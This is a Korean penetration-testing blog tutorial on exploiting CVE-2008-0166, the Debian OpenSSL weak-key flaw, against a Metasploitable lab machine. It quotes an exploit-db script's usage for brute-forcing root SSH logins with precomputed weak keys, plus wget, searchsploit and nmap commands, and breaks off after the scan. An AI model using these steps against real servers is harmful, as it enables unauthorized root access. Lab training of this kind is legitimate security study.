딩굴댕굴

Metasploit - 08. CVE 2008-0166 (취약점 진단 및 공격)

by jennysgap

BOX

CVE 2008-0166 (취약점 진단 및 공격)

Debian OpenSSL Package Random Number Generator Weakness
• CVE-2008-0166은 Debian OpenSSL 패키지 난수 발생 취약점을 의미한다.
• 암호화 키가 생성될때, 사용하는 임의의 데이터를 추측하기 위한 취약점을 Exploit할 수 있게 된다.
• 만약, Exploit이 가능하다면 암호화 키를 손상시켜 민감한 데이터 접근 할 수 있게 된다.
• Debian OpenSSL 0.9.8c-4etch3 이전 버전만 해당

1. 취약점 공격 방법
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#     - execute: python exploit.py (without parameters) to display the help
#     - if the key is found, the script shows something like that:
#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#         Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
#############################################################################

[Kali Linux 에서 Exploit DB 검색 및 문서 확인]

# /usr/share/exploitdb/searchsploit openssl        ( Exploit DB OpenSSL 검색)

# cat /usr/share/exploitdb/platforms/multiple/remote/5720.txt


2. 취약점 공격하기 전에 해야할 작업

[Kali] SSH RSA 관련 파일 다운로드

# cd /var/tmp

# wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2

(--nocheck-certificate  : 인증서 없이 파일 다운로드)

# ls -l 5622*

# tar zxvf 5622.tar.bz2


[Metasploitable V2]

* Linux 관리자 암호 설정

* msfadmin 사용자로 로그인

$ sudo -s

# passwd 설정


3. 취약점 공격

# nmap -sV 192.168.49.148 -v












반응형
저작자표시 비영리 변경금지

'BOX' 카테고리의 다른 글

해커에 대한 정보를 공유하는 사이트  (0) 2017.01.16
모의해킹 관련 사이트 정리  (0) 2017.01.16
네트워크 해킹 - 22. Nessus를 이용한 취약점 스캐닝  (0) 2017.01.12
네트워크 해킹 - 24. OpenVAS를 이용한 취약점 스캐닝  (0) 2017.01.11
네트워크 해킹 - 24. Waffit을 이용한 웹-방화벽 스캐닝  (0) 2017.01.11

블로그의 정보

jennysgap

jennysgap

활동하기

티스토리툴바